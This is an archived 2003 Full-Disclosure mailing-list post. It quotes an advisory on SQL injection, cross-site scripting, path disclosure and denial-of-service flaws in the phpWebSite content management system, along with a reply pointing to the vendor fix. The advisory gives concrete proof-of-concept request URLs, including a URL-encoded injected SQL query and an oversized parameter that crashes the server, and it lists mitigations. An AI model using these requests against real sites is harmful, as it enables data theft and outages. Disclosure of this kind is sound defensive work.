lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: seclists at violating.us (Jack Whitsitt (jofny))
Subject: phpWebSite SQL Injection & DoS & XSS Vulnerabilities

There is a fix for this available at phpWebSite's page (posted a short time
ago):
http://phpwebsite.appstate.edu/

-Jack Whitsitt


----- Original Message ----- 
From: "Lorenzo Hernandez Garcia-Hierro" <novappc@...appc.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Sunday, August 10, 2003 6:15 PM
Subject: [Full-Disclosure] phpWebSite SQL Injection & DoS & XSS
Vulnerabilities


>
> phpWebSite SQL Injection & DoS & XSS Vulnerabilities
> ------
> PRODUCT: phpWebSite
> VENDOR: Appalachian State University
> VULNERABLE VERSIONS:
>
>        - 0.9.x
>        - 0.8.x
>        - 0.7.x
>        - And older versions.
>
> NO VULNERABLE VERSIONS
>
> - ?
> ---------------------
>
> Description:
>
> phpWebSite provides a complete web site content management system. Web-
> based administration allows for easy maintenance of interactive,
> community-driven web sites.
>
> ---------------------------------------------
> |SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
> ---------------------------------------------
>
> I encountered SQL Injection vulnerabilities in some of the phpWebSite
> modules , XSS ( Cross Site Scripting ) , Path Disclosures and a Denial
> of Service attack.
>
> -------------
> | SQL       |
> | INJECTION |
> -------------
>
> I encountered SQL Injection vulnerabilities in the Calendar module ,
> active in default configurations , that allows you
> to execute SQL queries in the target server with the privileges of the
> application user.
>
> When you send a special-crafted command url to the Calendar script you
> get a SQL error flag like this:
> __________________________________________________________________
> DB Error: syntax error
> select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED
> VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
> (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
> VALUE]0110)) and active=1 [nativecode=1064
> ** You have an error in your SQL syntax near
> '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
> (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
> ___________________________________________________________________
>
> This is an example error flag:
> ___________________________________________________________________
> DB Error: syntax error
> select * from mod_calendar_events where ((startDate >= 2003\0-10110 and
> startDate <= 2003\0-10110) or
> (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
> [nativecode=1064
> ** You have an error in your SQL syntax near
> '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
> and endDate ' at line 1]
> ___________________________________________________________________
>
> For get this you must use this simple url:
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =day&year=2003%00-1&month=
>
> And you get the SQL Error flag. The error occurs when the query
> includes the crafted value 2003[%00 = null]-1 .
> You can design a successful query for get configuration values or
> authentication data.
> I desgined an url that makes a successful query ( no hostile query ) :
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
> 20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
> 29%20and%20active%3d1
>
> it is ( without url encoding ) :
>
> 2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
> 20071205)) and active=1
>
> It is needed to have a little knowledge of SQL ( in this case , MySQL )
> for make a successful attack.
>
> Other scripts of the Calendar module are affected by this hole , when
> you send a crafted request like a + symbol at critical url variable
> value
> you get the "pure" sql server error flag and you can imagine ( i like
> this word ) a sql query for view private information of the application
> by
> looking at the error pages , like an try-error method.
>
> Another urls for probe are:
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =day&month=0&year=<
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =day&month=1%00&year=)SQL_INJECTION_FAKU
>
> ------------------
> | XSS            |
> | vulnerabilities|
> ------------------
>
> I encountered XSS security holes in some scripts of phpWebSite :
>
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
>
> http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
> =viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
>
> http://[HOST]/[PATH]/index.php?
> module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
> &MMN_position=[X:X]
>
> http://[HOST]/[PATH]/index.php?
> module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
>
>
> Note that the Calendar & PageMaster & Fatcat modules are affected
> COMPLETLY and all the script variables that are passed by url are
> affected too by this.
>
> When you access a hostile link with a xss attack in those scripts youur
> browser will execute the script commands.
> This can be use for steal cookies , authentication tokens and other
> private information.
> If your browser is vulnerable to other holes ( like MSIE ;-) you can
> have more problems...
>
> XSS AT SQL ERRORS:
>
> If you send a crafted url command with a XSS attack code to some of the
> scripts that are vulnerable against sql injection vulnerabilities , the
> xss attack code will be executed
> in the error page.
>
>
> -----------------
> | PATH          |
> |  DISCLOSURES  |
> -----------------
>
> I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and
> versions:
>
> - Sambar Server 5.2 beta
> - PHP 4.2.3 running as ISPAI module
> - MySQL NT [normal service] 3.23.56
> - Include_Path to the pear folder of phpwebsite
>
> Sending this:
>
> http://127.0.0.1/index.php?module=calendar&calendar[view]
> =month&month=11&year=9 # You can try other things and get the same #
>
> you get this:
>
> Warning: localtime(): invalid local time in
> C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
>
> Warning: localtime(): invalid local time in
> C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
>
> <- more than fifty repetitions of this warning ->
>
> It is a strange error , i think that it only occurs in MSWindows
> installations.
> Possible it occurs when the Pear library TimeZone.php script tries to
> convert the localdate in unix time stamp format.
>
> ------------------
> | DENIAL OF      |
> |  SERVICE       |
> ------------------
>
> There is a DoS/Buffer Overflow Attack in a script inside the Calendar
> module that allows you to crash the host running
> the MySQL server and the phpWebSite scripts ( must be the same
> computer ).
>
> This is a basic proof of concept for this vulnerability :
>
> http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
> [VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
>
> An attack like this causes a system global crash including the server
> service and the mysql service.
>
> -----------------
> |   SoLuTiOnS   |
> -----------------
>
> 1.- Be sure that the user of the phpWebSite database has only SELECT ,
> INSERT and UPDATE privileges in only the phpWebSite
>     database.
>
> 2.- Use the php function eregi_replace for prevent XSS attacks.
>
> 3.- Turn php_error_flags to Off .
>
> 4.- Use in addition an external module if you are using apache like
> mod_security .
>
> 5.- If you are paranoic don't use PHP , MySQL , Windows , Linux ,
> computers , tcp/ip ,  netbios , games , asp ,
>     Apache......  nothing !
>     WARNING ;-) : ( paranoic solution... )
>
> -----------
> | CONTACT |
> -----------
>
> Lorenzo Hernandez Garcia-Hierro
> --- Computer Security Analyzer ---
> --Nova Projects Professional Coding--
> PGP: Keyfingerprint
> B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
> ID: 0x9C38E1D7
> **********************************
> www.novappc.com
> security.novappc.com
> www.lorenzohgh.com
> ______________________
>
> NSRG-20-7
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ